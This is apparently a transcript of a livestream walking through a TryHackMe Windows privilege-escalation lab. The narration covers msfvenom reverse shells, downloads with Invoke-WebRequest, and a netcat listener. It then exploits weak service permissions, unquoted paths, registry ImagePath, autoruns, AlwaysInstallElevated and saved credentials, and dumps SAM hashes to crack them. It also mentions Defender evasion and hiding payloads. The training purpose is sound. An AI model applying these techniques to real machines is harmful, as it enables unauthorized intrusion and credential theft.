Hmm. Alright, what's up everybody? Welcome to Attack on Tuesday. My name is Taggart, and we're going to do some Windows privilege escalation tonight. I have been doing web app hacking for the last week or two, and I'm pretty much finished with my cert exam. I'm just doing up the report now, but I needed a break from web app stuff. So I thought I'd do some Windows privilege escalation this evening. So we're going to start here and try hack me. There are two privilege escalation rooms that are really solid. One of them is from Heath Adams, the Cyber Mentor, and this is the other one. So we're going to start here and just get this going. Oh, this is from Tiberius, or it has... Oh, okay, so this VM was created by Sagi Shahar, and then it was updated with content from Tiberius. So if you don't know about Tiberius, go check him out. He has a pretty good Twitch stream as well. But, so I have this machine up and running. And let me use our desktop to connect to this thing. I used the wrong password the first time. Our desktop is a really nice command line RDP client. You can use X-Free RDP too, or you could use Ramina if you wanted. I like our desktop. I don't really know why. It's just easy. Oh, and it redraws the screen at different resolutions better than Ramina does. Yeah, see how clean that was? Ramina, I can't get it to work that easily. So, generate a reverse shell executable. It's the first thing that it wants us to do. Now, it's kind of interesting. It's having us do Windows 64 shell reverse, and it's doing it on port 53 so that we won't get caught, which is fine. But we're going to take this a little bit beyond that. So, for one thing, if this thing had Defender on it, which I guess it doesn't, I guess it doesn't have Windows Defender enabled. But if it did, this payload would get caught immediately. Yeah, see, it has real-time protection off, which is not what you're going to find. So we'll do this, but then we're going to turn real-time protection on, and then we'll see how it goes. That's going to be a little bit different. So we'll start by making the MSF Venom payload, right? Windows x64 shell reverse TCP. And it's not using Meterpreter, in part because that would definitely get caught. Well, not with Defender off. Let's just do it, right? It's nice and easy. We don't have to fire up the Metasploit listener. So MSF Venom, payload is Windows x64 shell reverse TCP. And the format is going to be executable. And the output is going to be, I'm just going to call it mt.exe because that's what I do. And then lport, what is my current? Okay, hasn't changed. So my lhost is going to be 10.13.7.20, and my lport is going to be, they want it to be 53. That's fine. We can make it 53. So that'll build. Meanwhile, let me get my own shell going. This is the one I've been playing with myself, which has been written in F#. And 10.13.7.20, and we'll make the lport 53. Let me save that out, and then build it. .NET publish. See release. I gotta rename this project. It's no longer calc test. It's actually the thing that I'm doing, but it's all right. And I am building this, in case anybody's familiar with .NET building. Oh, crap. This is wrong. That is not what I want to do. I need to change that target framework. The whole point is that if I change this to a signal, what I want to do, if I change it to .NET Core, is it 3.1, I think? Yeah, I think that's right. If I build for that, then I'll get a single executable with all of this other configuration for my build. Netcore 3.1. Does that work? Oh, man. Weird. Okay, well, we'll play with that in a second. It's not super critical right now. It's funny because I have it building. Do I not have Netcore? I know I have both versions on here. Okay, so we have our mt.exe executable, and what's it asking us to do? Transfer the file into the C privesc directory on Windows. The simplest way is to start an SMB server on Kali in the same directory, and then use the standard Windows copy command to transfer the file. Yes, that is an easy way to do it. And let's show how to do that. Let's do that. So on Kali, you would do sudo SMB. I think this auto-completes at this point. Does it not? In packet. Yeah, it's in packet SMB server. There we go. So sudo inpacket SMB server, and I always forget what the options for this are. So I think you have to give it a specific IP address to bind to. Yep, there you go. So you give it the IP, 10.13.7.20, and then you will give it the share name, which we'll just say is MT, and give it this folder to work from. And then over in our Windows file here, we'll open up File Explorer. This does something else cool for us too, which is it'll get us the hash of the user that connects. 10.13.7.20/mt/mt. See? So we're seeing a connection here. And this is the hash. If we take this, we can actually crack it with John the Ripper later. Although, for some reason, I can't get it to connect. I may have to enable SMB2 support. This is why I don't like using SMB for this reason, unless I'm trying to grab patches, because it's a little finicky for me. Let's enable SMB2 support. Okay. Yeah, see? But for sure it's there, right? If I fire up a PowerShell window and I ping, it's definitely there. So I don't know if I'm missing something there. And that's 20/mt /mt. It doesn't want to play, even though see, you can't access the shared folder because your organization's security policies blocks unauthenticated guest access. Now, is that an option I can set in Impacket Server? Let's set the username and password, see if that does any better. User, password 321. Let's see if this does any better. Oh, it does. Phenomenal. Okay. Interesting. So here we have mt.exe. It's listed as an application. So here it is. And I can copy this over. Now, I'll put it in the privesc here. Thanks for all those extra tools. But while we're here, let me show you the other way that we would do this, and the way that if I were like sending a malicious payload to this computer, this is not how I would do it, right? Because this is super visible. I might try something a little bit more like this. Let's kill the SMB server. And instead, let's just bring up a Python web server. And here, now this is visible too because it's over HTTP. So there are some other things you can do to get this over HTTPS, right? Especially if you have like a public, like a cloud-based delivery system or something like that, where you can have an easy SSL cert. But from here, you know, you can do IWR or invoke web request, give it the URI of http://10.13.7.20 port 8000/mt.exe, and then outfile desktop/mt.exe. Let's just throw it on the desktop for a second. Okay, so that works just fine. Now, also, ideally, you wouldn't really want to do this in an actual engagement if you could avoid it, because if you are working against something with antivirus or with EDR on it, this thing is going to get detected, right? If I turned real-time protection on right now, this thing would disappear because it's a known quantity, right? All right, we'll knock that off. Okay. So what we're going to do now is we have to set up the listener for our reverse shell, which, if you remember, was on port 53. So we'll do sudo nc no name resolution verbose listen on port 53, and I need to do it with sudo because it's on a privileged port 53. Okay, coming back over to our desktop. I'm going to do this from the command line. cd privas, nope, desktop, cd, desktop, ribesk, please. Oh, I guess not. Where is this thing actually? Oh, it's in C. Okay, C, ribesk, cool. And I'll fire off mt.exe. And over here in my terminal, I have a shell. I can do fun stuff too, like pop up calc. It's always fun. And then I can ask for who am I, right? I can ask for privileges. What privileges do I have? Who am I /priv? And doesn't look like I have anything super cool right now in terms of privileges. This is a pretty basic user, but it's a foothold. All right, so we have the shell. Service exploits. So we need to use accesscheck.exe to check the user account's permissions on the DACL service. This is eliding a lot of information, so let's go through it a little bit. The first part we need to know is that we have this tool called accesscheck.exe. Pretty cool thing. Let's run it from the command line and see what it tells us. Yes, we agree. So these are the options that we have for access check. The C is kind of like the name of the Windows service. We could say show explicit set integrity levels. We have all sorts of cool options here for access check. The reason we do this is because we need a little bit more information when we're looking to go after services. And let's even back that up. Why are we going after services? Services, right, are obviously running with elevated permissions on the Windows operating system. The services are defined with something called a bin path, right? The path to the executable that is running as that what is being hosted by service host, right? What is the child process of the service host instance that it's firing off? Now, the path sometimes is unquoted, meaning that there are spaces in the path and they didn't add quotes around them, which can be exploited. If you have write permissions somewhere in that path, you can kind of trick the service host into launching something other than what it was intended to. The other thing that we're trying to go after is any service that we actually have control over, right? Starting and stopping. And then if we also have write permissions to the folder where that executable lives, what we can do is stop the service, replace the service with our own evil process, then restart the service, and now that service is running as system, right? And it's doing what we want it to do rather than what the system is supposed to do. So that's what we're trying to do. But first, let's see what SC or the service control, the exe query gives us without any extra help, right? So you can see here, these are the lists of services that we have on the system running. And you do this enough times and you start to get familiar with the services that are kind of default to a Windows system, right? Store service, system events broker, seclog. Some of these are a little bit weird to me, at least. I don't see them every day. And they're telling us to look for, oh dear. And this room is telling us to look for DACL service. But why would that be? So it's stopped. And we don't really know much more about it. So what we're going to do is we're going to run access check with -C against DACL service. Okay. So what do we know? We know that it has RW, read-write for system, of course, read-write for administrators, and read-write for everyone. Well, that's just cool. Oh, we want a lot more information. So I did it with the C, but we want the U, W, C, Q, and V. Wrong thing. Let's go back and run that access check again by itself, and let's learn what those command options do. So suppress errors, show only objects that have write access. Q is omit banner, fine, and V is verbose. So V, U, W, Q, V. I think that was all of them. Okay. Interesting that it's not, it's like drawing wrong. Service all access, service query set, so. Ugh. There we go. So everyone can start and stop it, and we know that it has read-write. That is great news for us taking over this service. And you can see here what we're doing is we're reconfiguring the service so that we don't even have to replace the executable. We're just reconfiguring the service entry. So we're doing scconfig, and then we're rewriting it so that bin path equals, and we're giving it our evil executable, right? Whatever it is. Let's do sc.exe. If you're on PowerShell, you have to specifically say sc.exe because there's a commandlet that's shortcutted to sc, and that's not what you want. So sc.exe config EACL service, yeah, bin path equals c privesc mt.exe. Okay, with that done, let's kill our current listener and bring it back up. And now what we're going to do is we're going to sc.exe start DACL service. With that, now we have a new shell and we're system. So we've now owned this system through that service control path. What is the original binary path name of the DACL service? Probably should have looked that up before. Can I use sc.exe to restore it? Nope, I cannot. Okay, oops, I forgot to look that up, so I won't have the answer to that one, but whatever. All right, moving on. This time we're going to query the unquoted service. Yeah, should have gotten that before. So you know what? I bet we could find out what the DACL service was. C, program files, DACL service. Yeah! There it is. Isn't there a way... I always forget this. Isn't there a way to get the whole path to... the whole path to an executable in Windows, like, copy the path? Yes, there is. Shift and right click, copy as path. Thought I remembered that. Oh, wrong thing. Put that in the wrong place. Let's try that again. There we go. Okay, now back to the unquoted service path. Okay, so same thing. We're going to run access check with D this time. What's D? I keep going to the terminal. So actually, so only process directories are top level key. Okay. So we're going to run access check with UWDQ against the unquoted path service. Oh, because we're checking for... I see, we're not checking for the service exactly, we're searching for the path, if that makes sense. So we're going to run access check.exe, UWDQ, or whatever. Is that right? Yeah, and against the path. All right, so what did we learn? We learned that our users have read-write to this folder, which is dumb, but great for us, for this purpose. Built-in NT. So, okay, so everybody can write to this thing. No write up, so we can't write to program files, but we can write to unquoted path service. This is a pretty uncommon, at least in my experience, pretty uncommon configuration, but if you find it, it's great news, especially when it's for a service. What is the binary path name of the unquoted service? We can kind of do the same thing that we just did, right? Program files, unquoted path service, comment files, and then shift right click, copy as path. Boy, I am going to not forget that. Okay. So now we're going to copy our shell from one place to another. And I can even do it from here, right? I can copy the privesc mt.exe to, and use quotes. Got to use quotes for this. C program files unquoted service. And so this time you can see we're actually common.exe. What's that all about? The reason we're renaming it common.exe is, let's look at the path described here. So it's unquoted, right? We don't see quotes here. And because of that, the way that Windows interprets paths is it'll look first. It kind of goes down the list here, and it will look first in like C program, which isn't a thing, right? So then it looks to C program files. Okay, it doesn't find unquoted path service.exe yet. Or it doesn't find an exe, basically, yet. Okay, then it goes to unquoted path. Still nothing. Unquoted path service. Still nothing. Common. You see what I'm saying? So if we put in common, which, by the way, so we can write here. We can write in this folder. So if we write to common.exe, it's going to be like, oh, cool. found the exe, I'm good, and it executes. That's what we're doing. We're short-circuiting the path traversal here as it looks for the binary. Okay, so we've copied the file over, and that's it, right? The service is stopped at the moment. So we're going to do sc.exe start unquoted svc. Oh, I better get try my listener again. And there we go. We have system through an unquoted service path. Different way to do it. But again, so both of these vectors rely on access check to help you understand what's going on the system. And that's a really important part to remember that you got to use that access check. And I have to say, loading that onto a system is pretty noisy. Okay, so if you do get a low-level shell, there may be some other things that you want to try before checking that out. You may want to try to learn how access check does what it does, which I still have to learn, to be honest with you. Okay, next up, let's kill that shell. Weak registry permissions. So again, it's going to be access check. Let's see. The registry service. Now the registry service shouldn't have... Notice that it has quotes around the path, rather than what we saw up here with the unquoted service. But where are we going from here? We're going to run access check again. Let's get the help back because we're using different options. So this is a key. The name is the registry key. Now, what registry key are we looking at? We're looking for... So HKLM, so we're looking in the local machine hive. System, current control set, services, reg service. So we're looking for, very specifically, what we can do with this registry key. Can we, as an unprivileged user, write to it? So system can write to it, no problem. Interactive can write to it, and then administrators can write to it. Is that enough? I guess interactive is, yeah, everybody logged in, right? It's a group of interactive sessions. So we're going to use the reg.exe, right? And basically overwrite this. We'll do this piece by piece. So we're going to reg at, it's going to be reg.exe if you're doing it in PowerShell. I just like staying in PowerShell because then I don't need to switch back and forth. /v for image path, for the value, and it's going to be there. The type here, and then the data is going to be this, and then f is force because we're overwriting, right? So let's copy all of this. But every time, why can I not click on the Windows session. But instead of saying reverse.exe, right, because that's not correct, it would be mt.exe. And you would want to put this someplace else. By the way, you wouldn't want to put this in someplace obvious. Program data is always a good one. I like program data. Okay, so now that registry key, which we can look at a little bit more visually. Let's look at HTLM, system, current control set, services, and then let's go find reg service. There you are. Hush you. So there's our image path, right? So you can see that we set it successfully. And again, we'll bring up our listener. And sc.exe start reg svc. And we have our system shell again. Look how many ways there are to do this. But this is, a lot of this is kind of under the assumption that you're not working against anti-malware or antivirus on the system, which more and more is not the case. Windows Defender is free, it comes with Windows, and it's really good. So you're almost never getting that lucky anymore. What can sometimes happen is you get a user that has local admin, in which case you can just turn Defender off. That's always fun. All right, let's explore insecure service executables. So this one is going to be file perm svc. So it runs a system. Okay. I assume we're running access check again against this executable. And tells us that built-in users has all access, right, to the file permissions, the service. So it's, again, simple copy over, right? I'm not even going to do this one because we've essentially done the same process, right? We've moved the reverse shell executable from one place to another. All right, now let's try auto runs. Auto runs are important not just for privilege escalation, but also for persistence, right? One of the things you're going to, if you get onto a system during an engagement and you want to maintain your presence, you're going to want to write to the registry so that you'll have something to come back in case you lose your shell. So let's query the registry for this value. Okay, security health has this value, windir system32 security health systray.exe, and my program has this. Interesting. Now, this auto run think of this as like, if you're a Linux person like me, think of this as like a writable cron job where I can replace this, right? Maybe. The next thing we should probably do, yeah, we're going to use access check again to see if we can overwrite this thing. And sure enough, we can. So this one we'll do. We'll do copy mt.exe to quotes C. What is this song? So in this case, we're not overwriting the service. Sorry, we're not overwriting the registry key. We're overwriting the executable itself, because we can write to that. And all we have to do is re-log in, because it's an auto run, right? And it's an auto run for kind of everybody, right? So we kill the session, and then let me bring it back up. Huh. That didn't work. Should I have done it with Y? Oh, you should not have to authenticate to trigger it. However, if the payload does not fire, log in as an admin. Okay, let's try that. The user is admin. What are they telling us the password is? It's so nice of them to tell us. Something has gone awry. Unless it's still kicking off. Oh, yep, there it goes. There's our system shell. Alright, we'll kill that and go back in as a regular old user. Get out of here, Savage. Alrighty. Always install elevated. This one is, you know, White Buffalo territory. You're not going to find it, but if you do, real exciting. So it's in HKCU, the current user Hive. Software policies, Microsoft Windows installer, value, always install elevated. So we're looking to see what this is set to. And it's set to 1, which is true. Meaning, whenever we install something, it's going to be installed as an elevated user. What? Why would you do that? But notice that there's an MSI payload that we can use from MSFNM. So we're going to remake the thing that we made before. But this time, we're going to change the format to MSI. Okay. And come back over here. We're going to do the same thing just to get the installer on here because I'm lazy and I don't want to fire up the SMB server again. So we're going to do IWR, which is short for invoke web request. URI, m.13.7.20, 8000, mt.msi, out file, mt.msi. Nope, that's not, okay, well. Great. So now we have an MSI installer on here, and if we run MSI exec quiet, and give it all of this, right? It will install this as an elevated so if I do msi exec.exe with quiet, we'll start the listener too. Does it have to be the absolute path? Apparently it does have to be the absolute path. Good to know. Okay. Kill this shell. Move on to the next one. Okay, so this one we're going to look for. This is a little bit more recon, a little bit less, you know, misconfiguration. We're going to look for the word password anywhere in the registry. So that's a lot. Let's... Now, since we're here, let's learn how to do this the PowerShell-y way, because I think it's a little bit cleaner. This playlist is killing me. Let's see what Stack Overflow has to say about the issue. Okay, that's more annoying, but it'll work. Ah, other people have written specific functions to do this. So we'd be looking for something like an actual password here. I'm not seeing anything super compelling. Thank you so much to the military helicopter flying over. What's it telling us to look for? Am I crazy or am I not seeing a password here? I see a SID, but I'm not seeing a password here. Interesting. I don't think we have it. In here. Now, they already told us that the password is password123, but that doesn't really give us what we want here. Yeah, I think that maybe something changed here where it's not actually present. So we'll leave that alone. List any saved credentials. Whoa! Where'd my R desktop session go? Oh, you know what I think happened? I think it died because some... If this was a Windows eval box... if it's too far out of date, your Windows eval box will restart after an hour. It's just a real cool thing to know about. Now you can reset the activation limit 3 times, so you don't actually have 30 days for a Windows eval. You have 90 days. All right. 20 seconds. Okay, well, while we're waiting, I still wanted to see if I could fix the build on this F# reverse shell, and maybe we'll use that this time. So I gotta check my target framework. Netcore App 3.1. That's what it's called. See? Netcore App 3.1. Okay. Now, try that again. There we go. So, right, when you're building an F# project, it turns out that if you target Netcore App 3.1, you can get it into one chunker of an executable, but it's still one single file rather than like a whole bunch of different DLLs that you need to work with. So in terms of a payload, not so bad. Can I just open this? I don't want to focus in reveal from File Explorer. There we go. That's what I wanted. So if I do publish calctest.exe. So this thing is huge, right? It's 55 megabytes, but it is a working reverse shell, and guess what? It'll work with Windows Defender on. So I'm going to copy this over into my alley box. Not there though. All right, so we might play with that in a minute since we have it and it's targeted to the right IP address. Where am I? Here. Okay, so we have the IP address again for the new box. Let's get back there. There we go. Now, where were we? Saved creds. We were doing command key / list. Let's fire up PowerShell. And let me fire up my HTTP listener. Real helpful. Thank you very much. Okay, here you are. URI 10.13.7.20 port 8000 mt.exe. We'll get the not Meterpreter, but the MSF Venom generated payload first because it's small. That was fast. Okay. And then let's get... What is it called still? Calc test. Let's call it something else. Calctest.exe. mtf.exe, because it's made in F#. So that's going to take a minute because it's 55 megs. So while it's doing that, let's fire up another one of these things. And what did it want us to do? Command key / list. Okay. So there is saved credentials for this user, whatever it is. And there's this here. Oh, cool. MTF is saved. So here's where run as comes in, right? So with runas.exe, you can, from the command line, impersonate, if you have the credentials, another user on the system. So we're going to do with a saved cred, and then you give the user of admin. So since admin's credentials were saved, right? What are we running? We're running the reverse shell. All right, well, we'll fire it off anyway. And run as .exe, save cred, user, admin, and we're going to give it the mt.exe in this folder. That would have worked better if I had actually had the thing running. There we go. There's our shell. Okay. Next up, Sam. Whenever I think about Sam in a computer context, I can't help but think about Quantum Leap. Sam was the computer that was directing, theoretically, the jumps of Dr. Beckett. Wait, is that right? Yeah, because his first name was Sam Beckett, but I think the computer's name was Sam too, right? It's been years since I've watched Quantum Leap. Easily one of the weirdest endings of any show. So the salmon system files can be used to extract user password hashes. This VM has insecurely stored backups of the salmon system files in the C Windows repair directory. So again, here, it's asking for that SMB share. So we'll go do that again. Let's connect to it. 10.13.7.20/mt /mt. Take your time. So stupid. So this doesn't work for me that often this way, but I found this works just fine, which is new SMB mapping, local path, and you can mount it to a drive, right? Like that, remote path, 10.13.7.20. Or, you know, not. Yeah, no kidding. Restart that and see if it does any better. Yeah, I'm there. Okay. Behold. Network mapping. Okay. So where did they say that this thing was saved? Windows repair. Okay. Who knows how big that is? Working on it. And we'll take the SAM file too. Now, what are we doing here? We're cloning a cred dump. I hate this. I don't want to do it this way. Because I don't want to use Python 2. Don't get comfortable with tools that rely on Python 2. This is going to burn you in the long run. No, let's see if there's any news here about this. So I would like there to be a newer version of this. Oof. Somehow worse. Yeah. I wonder if this has been updated since Tiberius did the thing. What? What is the command if it's installed? Oh, is it cache dump actually? Is the name of the command? Or PW dump? So confusing. If it's installed, there it is. So what do we want to do? We want to do PW dump first with system and SAM. Easy enough. All right, well, what we're going to do then is we're going to take that. Now it's saying use hashcat, but we can also use John the Ripper here. And we want the... Yeah. So we'll do sudo John hashes.txt word list equals user share seclist rocku.txt. Just kidding. Come on. User share word list. Yeah. It didn't like that. Okay. Well, we'll take the admin hash here. Nope, wrong thing. This here. Did we get it? Show. No. This is 6-pack cracked, but... Let's try hashcat. Hey, thanks for the follow, KKZs. Every time. Oh, it's just the last part. Okay. For some reason, I thought it required both sections. You need to wonder if this isn't a fish problem. Okay, no. Why am I getting segmentation faults here? This was happening to me the other day, and it turns out I run it on my Windows VM. It runs just fine. See? I don't know what the deal is. Great. Didn't we know that already? Oh, what is the NTLM hash? Okay. Well, I think that's going to about do it for tonight. I'll be passing the hash and the other fun stuff for a little bit later. But it's good practice on Windows exploitation. Hope everybody had a good time. And, yeah. Is there anybody doing anything right now? No, plus nobody's here. Alright, I'm just going to get out of here. Have a good night, everybody. And I will be back tomorrow doing something actually really fun and a little bit different. I'm going to be doing some programming in Node.js, which I haven't done in a while. And it's for a really fun project that I've been working on to help inspire you when you get stuck on problems. So, I will see you then. Until then, happy hacking.